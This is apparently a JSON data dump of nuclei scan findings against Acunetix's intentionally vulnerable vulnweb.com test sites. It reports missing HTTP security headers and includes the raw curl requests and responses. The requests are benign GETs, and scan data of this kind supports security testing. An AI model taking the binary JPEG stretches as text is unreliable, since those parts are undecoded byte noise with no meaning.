篡�ӟO<���bd(����i�n��o\u001b���q��������7z\u0016#�U���������fe^\u001a���.kYrQ�4E�5����d��\u001c\u0002NԠ�\u0010��$w��O�0$\u0012��x���L���\u0004��.�lR�c�H5���Ŭ1��Y\n�\u0006�\\\u0005\u0003�_<�n�՞2��'u�84s�B\u001a��i��J\u0002�*�GI1�a\u0011�6�T��\u000b*�\u000bW�\u001f�~���P`��P��ۻ1w��fbI�9���h��\b����\u0015QI&�\u0001G=z<��\u0015_\u0012�i\u0001/c@��ZS�H��b\u0012��\u0018�K�`R9w,G\u0002\r_S���K�ַZ��~!9�4��5Dc܇jPF\u001cݐ�l}�{4���锉��*fm�����׻h\u0015f��\u0019{z!��\u001d8W`_���\u0005�W`C��o�=M�\fG\u000fu`\u0001���\u0010\u0019%<��fk����I/�4_\u0001�/�f_�,(�HǫРM�=\u0005�?z�mY;����\t\nzu��篃]\u000em|GYꬔ�B�%MY՟�\u0017]<�kkUQ\u0015���V76�D�������\f�������/�p�M\u0010!����o��J�[�;\u001b\u0004_RB�#\u0005��@�� �=8$_�p�Y\nV�2\u0016�%��\u0007��yѨgӘ\r\u0018�=7W��\u001f�\u0016�|\u001b=1��b�+�<�� <O�j�\u0003V玎�+~�Q����x���\u001d��?\u0010O,_��'��C\u001bN�b�<�n\n\u0018��n��\u0018�\u0015d_��N\u0011��;�\fȼ���͑��{4�tq�:HF�I57"�\f�\u0013a�F��������B��'$���\u0019cy^��8���\u001e6�^E�\u000e_����ru��La��\u0019�6�\r\u0005t$\u0017b�\u0016�kn9�U���?�U�m�\u0015��O5|�z#��;.��Ԛ�i*���v�b\u0005� ]mcԟq��\f�l��\t%E�\u001c�'?��O\u0007�'��)�њ8�\u000b�u\u0006�Y���nQ�ߥ�9��\u0002\r\n��W\u0015�����i�u�qFY�)U�n��\u0002��ӽ\u000b$�,~f#(t��87���G>*�}z��/{�@5S��z\u0016�\n�!f�H�\u0019\u0002m\f�6��n�\u001b`\u0005�NVȻ\u0013�9\u0004��]����7W�,�,��_zG\fP@�!�\u0004h��\n\u0005\u0001}�;�p�,��d��Z�O\u0003�j<�t�\b�A2\u001a�\u0013|u�+��*�S�Ԑ\u0011�3���������h��?A�V2\t�,�\u0015��*���A�Zy����d'k*�-�M����n�\u0007��\u0016E�S\u0011C\u000b�%���_�}�50j\u0016#�i�ƀ���W�U��j�y�1\u000b\u0006��\u0013��$��2Q�uA��P��I�2i=�\u001b��\rq�h�P+�\t��$��\r$���x�`��\u0001\u0007�\u0004U����p\u0004E�Ԅt8�Dl!����\u000e��\u0016���%�j&�\u001eÓҸ\u001c�\u0005��uh�eT\by��ہ\u0016v��]��;���k�^��/#6�����l�\b\u0015`\u0002�x\u0007�8�{<�\u0007\u0006�\u0015���ZD�\u0002Á�Z�Yv�3X�x�]�\u000b9:v����\u001c\u001fo��*�t������l'���\u0015d�)�XC����A?�[�;\u001e0̆�\u0006���{$�:\u0011~E�\u001eˌE_�:�cd�6����@\t x\u001f�ZX�0���r\b�\u000b&�X5q��W��\u00114!Ķ(\u000b�P�\u0015�!`�\fQP��\u0016]���S@(n�\u0015<�?sB�h����=\u001e,�&�63��׿mO�ȅ\t I�C\u001c��\u0010�ɽ�ŀ꠆�u\u0004\u001a�#��|�`j��T�\u0014h�1=�\u0004W ݃�&󷦱�fU\u0014\u000b��#�O'��F�>y�\u0013�1���|�&U\u0004�`,{�\n8�g�$���N�!sjň\u00062�]\u001b����Uu�s����s�`t%�T�\u001bzr���\u001bd$h�����&�鿱Q��Z2��J�E3�.��#���\njd3\u0015�L��R�E��d�\u001cw<p:_$N҅�Nc\u0006��\nO���T�5\b�G#iF�\u0011?.����@������Y�y\u001c�̞h*gf\u0014�3-�N��#B;��z���b\u00074t�E�P�ʦ3 ��v��H\u0004\u000b�\u0016y=,���\u0014�"x�\u0002�����J�\u0005J�<�$�\u0004U^Dح�כ\u001dc�c\u001aK��K_���9^\u0018�W�aZ�]��Զ’\u0002�T�\u0006(y��\u000f���9c\u001c<�\u0014���,�t��Y��_o\u0019\u0016������7��b�T��cma��q�Y�^\u0017��N#V+�q�.�C"���L\b�M��:\u0002~�k�|�}�xA�*���8����Y\u00022�*�\u0004\n6��\u0001�\u0003���\u000e+�I\u001e�T\u0004\u0006�*�t�/8Xb��\f�akr��V4��$���Cvp��.W�\b\u001a�\r��5F\u0016�7F�o[�\u001d�#��w}1��n\u0010MHٛ���k��L�,Z��\u0005\u0014Esȫ\u0007�:x�k�U��h�~ߘ���^*��\u0019��8X���|x4L:�Ga����]Z�\u001b,jC9�!�\u001e\b����ŞVaL���Qg9~p\f��+���\u0019�\u001a��l�p�\u0018�Q�\f1'F\u0018a�$g\u0018�\u0018c\u0014�u\u001d��o�\u0018bR���\u0018`�F\u0018a�$a�\u0018�Fr�\u0018bF�a�\u0018(���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 987, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 1, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' 'http://vulnweb.com'", + "type": "http", + "http_url": "http://vulnweb.com", + "discovered_date": "2024-11-13T02:42:44.295Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:26 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 988, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36' 'http://testphp.vulnweb.com/wvstests'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/wvstests", + "discovered_date": "2024-11-13T02:42:44.625Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /wvstests HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:27 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /wvstests/</title></head>\r\n<body>\r\n<h1>Index of /wvstests/</h1><hr><pre><a href="../">../</a>\r\n<a href="pmwiki_2_1_19/">pmwiki_2_1_19/</a> 08-Apr-2013 08:44 -\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 989, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/6.jpg.tn", + "discovered_date": "2024-11-13T02:42:45.031Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/6.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4345\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:20 GMT\r\nEtag: "4dca64a1-10f9"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001d\u0001\u0001\u0005\u0001\u0001\u0001\u0004\u0003\u0005\u0006\u0007\b\t\u0002\u0001��:\u0010\u0002\u0001\u0003\u0003\u0002\u0005\u0001\u0006\u0004\u0004\u0007\u0001\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061\u0007\u0013"AQa\u00142q���\u0015#B�\bR��\u0016$br������\u001b\u0001\u0001\u0005\u0001\u0001\u0001\u0002\u0003\u0004\u0006\u0005\u0007��0\u0011\u0002\u0002\u0001\u0003\u0003\u0001\u0006\u0005\u0005\u0001\u0001\u0002\u0003\u0011\u0004!1\u0005\u0012A"\u0006\u0013\u0014aq�2����BQ������\f\u0003\u0001\u0002\u0011\u0003\u0011?�JR��~���'�\rz5���[��PU�pT\u0012\t�$�a߷֛)�\u001f��T��ĩUn ��y!�7�Xث��\n�pA\u0007�~C\u001b�*�\u0012���*���O`)�\u0014�[n?\u000bm���_��Fv���@Hls���X���:�u\u000f��ݣ�e.��"�G�#<7��#\u0004�0Mh�)�q.\t\u001dR^\t�\u0015�\u0017�]iڽ��-�\u0013,',���\u0018��<�;��gu\u001e�\u000e����P\t�e�7*��'����M��\fVR�LH������\f\u001c�ˑ�\u0007\u0015�i]=\u0012�+.X\u00101���9\u0003۵f��I����\u0005��Ma\u001cg��M�^�kp1$M��\u0010\u000f�\u0019��\u0011�"�WV�/OEu%�\u0017\u0010�,�ݸ>p0�l��\u0003 �\\v��=K�E�ot���[iZ3�\n�\u0001����\u001f��E���;rS��[-ԥ*�\b�)@\nR��)@\nR�DŽ�\u001a����x��\u0012��६�C ~1�\u001c烐p1ۜT:�Ezx;,xHt ���/��[T��Oan��\u0014�6]FH ��~\u000e����Ji��\u0014��j;���OW�\u001f�\u001f53��4��n$��9\u0012eo0�`�b�9\u0001�#,��\u0004��Y����.\u0012g�[{�\\1\f������������azj����->���Ma��\u0011�ꚽ��\u0018f�G�q\u0012&�&3��Q�0T��������E�[^�Is�tp�[1\f{�\r��~\u0004�z�5�G\u0012eG�:�@8'�\u001e@� \u0001��H�\\6����8�� �\u001c�ƌz��;��1�y��\u0013\\�=���\n*\\~ÝUJO(�ZD!\u0002$��e�\u000eCn\u001fF\u001c\u001fʯ�t�w�K\u001cc\u0002u-\u001b�68�\u0019?\\sߜ�qY���$���뱉b\n���>~�Z��8S�Q���s�U;z����̙(��[�X]DV\u001b�W}�\u0002\\\t\u001c\u001e���\b�Y��h�F��\n4��a��8�l�\u001e;�\u0013�*�5��^-��3�\u0001 pO������k\u0003\u0018�n#B\u0019J�<�\u001e��]F��/�'zQ��d�0\\}�y\u001b|ou4H\u0013��Y�g#��3\\��$�\u0017�����A"G�Z��1�y�&7���3��}��.���NH��0�\r�g\t�L\u0012���X\u000f�\u001e\u001f���ؠ��\u001e�\f�u��p��\f��\u0014�\\��\u0007\u0007\u0018=N��#��E��/)���7�{\f.N �JԬ��o�,�#1����J��������*-zj�tr�*�A"���a\u0013�"�\u000e\u000b\t������@\nR��)@\nݽ\u0019�\u000e��tJi7�;\u000f�\b\u001d\u0004W6Q�^bn\u001b��r�\u0001݇\fG�q��*U}N��TT-YI�t&��\u0013�n���7�tKy�n-�%x\u0004�\bϨ\f.C\u0002ʳ\u0005$pH8�\b[��"]�-���,�r-\\\u0004i��#.Oel\u0010\u001b�;O#\u0019�O\n�@��}n9�.�\u000f i�\u0007��o�\u0003�\nϺ��[�g�4�m<�:��Y��+mf���n�\u0015�M��Fw��\u0007z�_�ŰԿq�1��\u001f,y-���[��}2�\u0005 x�Q<Bkq'\u000f�\u0003r���I\u0003\u001f\u0004|\u001a�%�b΀�\u0007'��.��g�����ݕ����\u0015i!�+�1�\u0001\u000e�%�\u0018����F+=�b��1ナ�YMt݋��ș�\u0019Dt��\u0014\\�\u000e_fcRC}x�\u000fDZ�>�\rݵմ�kr�\u0016��ψ��^0Ɂ�\\\u0013�\u00169<�\u0001W8�Y�z\u0015<�;Np�����U\u0003�\u0004\u000eǸ��Дc?W\u0001��"�\\%�@��'\u0001��ʺ�����=�\u001a�P��7��\u001f� �K;��\u001c��\u0006\t\\z�\u0017�\u0005��0��rx\u0018\u0019�n)�M��_�G"5�I%��\t\u0002V�����qT��/,\u000e�\u0019]C�\u0003��\n��\u0003R���a\u0001\u0016�\u0014h�E��1\u0004�p\u000f\u001f8��QU\\��\u0016^E�74w��\u0010�p�sG�b�\u0015\u0001fE?˺���l\u0003\u001e;\u0006��.\u0003ᯄ6�\u00163[u��MQ�%b��hT*�0R;�'��\\`溺�$��<�(0�\u0018�|`��U�P��]ķ�!�B�>0T�a\t��\u0019\u001e�\u0011�gAG]�Q��f���RǏ��"�\u001c��5~��t��M�6��$p��I��+�m�\f\u0002{�x��9\u000bZ�.�mR�O�����r���<\u0010\u000e\b�}\rz;\fP�\u001cN�dP7F㜃��pG��\\��'|5�L\u000f�Z4\u0011��)k����I�#.J�z\u0007$�=9�8\u0002�~�u��t^��\u001f_�3Q\u00055���\\�)[€�)@\nR��)@\u001d5�7�K'H�\u001a���}.O9\u001eFr\u0004\u001d�*�\u000b(�\r��v\u001c1<o��EK[����1R$i\u000b\u0015�c@����\r���\u001c�\n��@�nt]R\u001b�6ı��̧�S��Eu����%��q̗��л\u001c\u0003�$�\u0019��)��\f�\rb���**WU���Ogz�f�Ԅ����\u001d��-< *��d1��\u0014c<\u001f�q����j���Im$��:\u000f0\u0014V_Ab\u0007��\u0004\u0015*W$����Z����;M\u0006�SYLRYrʌ]��\u0014\u000e\u0007��\u00198�\t�lU�ÿ\u0013���d�\u0013ej���e���\u001f��\u0018e*�6{z\u0018}�\u000e\u001d\u001d3U\n%j_-��G�4�2����������1��bIc�f\u0001ܣ%\u001aA�'�RN\u0014\n�b>ߤ���>Z2�g\b��r��r\n�#���-N���\t�l�2�BF\u000f�\u0011�E}i��'��ܬ2yh��lM����@?�\u000f\u001d��)O�\u0012�"4��\u0017\u000b4A�ӆ(�N@e$0\u0007\u0003 \u0010Goj4�b��W\u0002\t1�g<q��?\u000b�1���N\u0013��X���8\u000e��1\u001a�\u0007�rs��J�4{�{eNy��l���N�'\r��ڟ%��9?�\\H��樑d\u000e�y�vc\u0018�l\u001eC\f��c?��u\u0017�:�\u0018\u0015 ���9\u0007����E��h�f��N�? g�##>٩v�)q\n�\u0013\u0006\f��\u001d�����9+������5�أ%��}�\u0018x݁uw<r2�y�\u0019�܏bI0z�N�R���h�{gc�G*���F\u0018!�\u000er;\f��o�!�X���v��\u0003\u0003;� d�H'\u0007��y\u0014Yb����/\u001f���\u0016����Bj:O^����ks~��e��\u000b��\f7#�\u0001�Or\u0006\u0001\f=��ֽ\u0019��eݬ\u001a�������Ȍ\u001d\u001cP\f?�O\u0004w\u0007�A=ܶV�k�$� ���Ci+\u0016$$�\u0017�9>�\u0019\u001c\f2ջ�.���Γ�ѵ+cotS̷�\u001b\\E0�\n�3�0r\u0001*���6�j��\\m��\u001e�����^zd����Vs�x[��e��uu�I�m8o�t�\u0018���\t�̀\u001eX\f.\u0018\u001c\u0015l`ղ���Y�I�\n�.<�R� ���+$鞮�zz�h�Xs�E��S\u00122G>�c��t��\u0011�ĖP���&˩�M\u0014��w<�����,\t�>�P)�j7:N�\r唅'��\u0003�~��j\u0015)ZMa��:��z�\u0014�i.\r�0��b�6�.~�\u0012I��Ͼs���������[�V\r���˒�\u0016%s�<���5����\\�G�7NH��w���<Ռ>F@,�w\u0003�s�9"�����=jd&W��ԏ1�m��ڟ@��ܱ��\u0005�4��l�Q�K)�|c�:TNV�&f):��\f9��\u0003������\u000f|��H��Kx�9�Ya�\f�T��.J��]�%�w�|�&0�w\u0003�\u000foҲ�\u000eܢ�c�a�\\SP��\u0011$2��7\u001b��|~+\u001b��[[����0$�ô\u0010s�~y�g�����-/��_4D�ޑ���9��@\u001f#��S5m@\\�\u001e�0ϸ�2��($��}���N\u001a\u0019S-�c��62�5�V�t���VR�\u0019�~�F\b �`�Ի=v���V2<�\u0002�bA��1' �3ܑ�yƓ��R�U�\u001d��\u0018�E��9ܟ�\u0003۱����T=T�ƭ��RyU7�*��\tu\u0005�G\u0003qQ���ƬˢO�e��\u0010���Q�:��5�s�F�l�\b#�\u000fЃ����ZMom��s2��}���`\u001229�\b�����#��{v�\u001c��V�\u0018u#��@��\\��_X��RА;\\+�Y�}\u0003��\u001c��+��*N���)���?an�W\u0013lx��/��\u0017���t�wD4N��I�\u001d���\u001d�@? v���r9��������ו���7%�9��5N�=?�ס��~Ne��\u001eX�)Wȅ)JR��\u0005)J��^ɧjVװ�2[Ȳ�e\f\t\u00078 �\b�\u0011��۾��P�M�Fb�H��\u000b�\\+/\u0003�\u000e\t�\u0013���j�tް�,��k\u0015t{kv-\u0018 �\\�\u0006�\u0012H�&���\u0004un2���znu��}#]\u000f:��=9a�~ď�\u001a��j�V���ʪ\u00103��\u0006I\u001e��{r\u0007\u0015�4\u001dXKio{lΚh��)%\u001e�\u0018��\u001d�\u001c\u0015��c���\u001da\u0016�u\u0004s�C\u0018\u000b$C'w�\u0004��n\r��������\u0014]��G,�u7_ZOc\u0006�\u0010H�l����� s��\u001fp\u0006@'�����K4\u0010�{\u0015IJ@]�\u0016m\ny�8\u0018���\u001a�ɼ�.n��3J�\u0015��I��Q���#�Ը�り�Y�z�\u000b���}F�\u0012\u001a7��ubC����x8��8�Z.���v�����[\u001fO�I\f��F�� �#�\u0013�V�U�\b��cn\b���rX��e��|�=��A�(PB��m\\\u001eG\n���'V��\rA�Mf���w�!*�����[�QU����\u0016\u0007J�K�JR�\u0018)JP\u0002��)JP\u0002��)JP\u0006ᖳq��]?%�\ry����� �\b�;f����f��ۉ�\n�Y��4���X�Q�N�$��iJ�\u0018�s��Hߤ�Ҕ�$b��)JP\u0002����", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 990, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/7.jpg.tn", + "discovered_date": "2024-11-13T02:42:45.472Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/7.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6458\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:21 GMT\r\nEtag: "4dca64a1-193a"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0004\u0005\u0007\u0003\u0001\b��6\u0010\u0002\u0001\u0003\u0003\u0003\u0002\u0004\u0005\u0002\u0007\u0003\u0001\u0002\u0003\u0004\u0005\u0011\u0012!\u0006\u00131"A\u00072Qa\u0014\u0015#q�B�3CR���������\u001b\u0001\u0003\u0003\u0001\u0001\u0004\u0005\u0006\u0001\u0003\u0007\u0002��0\u0011\u0001\u0003\u0003\u0002\u0004\u0003\b\u0003\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0011!1\u0012\u0013AQaq�\u0006\u0014"2�������\u0015B��\f\u0003\u0001\u0002\u0011\u0003\u0011?��I�KMc��������^�ܡ�y!�2��w\u0005c�ϓϑ�\u0019�|x�\u001bT]K=$4n�2�\u0014ʌb��\f�\u0018,1φ�G�Qz~��=t�W�\u0002\u001aF*�O0uw�G�����|��q�7<6nI��<��\u0012)]%?��@�\u000ez�q���\u0014\u0003�s�j~��E ����μ��\u0017�Rׄ�H�7Y_$�5��T��\u0018Bʤ���������}\u001d�&�#R���O�d>�� y�\u001c��\u0007VR\u001c�\u0001u�v�4*Q�\u0018�� ���ަ\u0003\n\u0014�;���\f�ppt5\\��a�l\u0006��:�L��\u00059\u0007$�5ǧ�3����i��vb`�J�d�\u000f��jNﶃ:B�u�)�2\u001fS;�\u0014�"�İ�\u0007r�\u0004K1\u0003h�\u0003:.W��Y���;�w\nCI9������\tϝ3w�H��D�p�f�y�\u000b\rp���\u00171�~\u000e7x϶uWCw�D�\u000b�\u0012E@�\u000e�\u0018\u0012FAR}���\u000f\u0007\u0004\u00105:V���r����0�ѐ7W\f��\u0017n04� o}r�N>��+\rb�':�6Ll\u0011��8lx�Bt���c+[����\u000fIt�j�Y!��!�^�qʑ�,{�疉q�_�����d\u0014��G$P��\n\u000eԳ��\r�R����<g\u001cx�]�H�\u001dT�J�VشQ��l�dd�\u0003$g*\b\u0004��:�r�\u001bg�M$�\u0004h����V�Km\u0018珮F�E\u001bc����\u0018�󟲧�Ϛ�\u001b �S�v�������\u000b�\u0012�\bc}�PHq��������KQ\u001cK�WD\\��8��\u000f�Ӭ��R��i�#U+:Y�JJ���2B��\fW 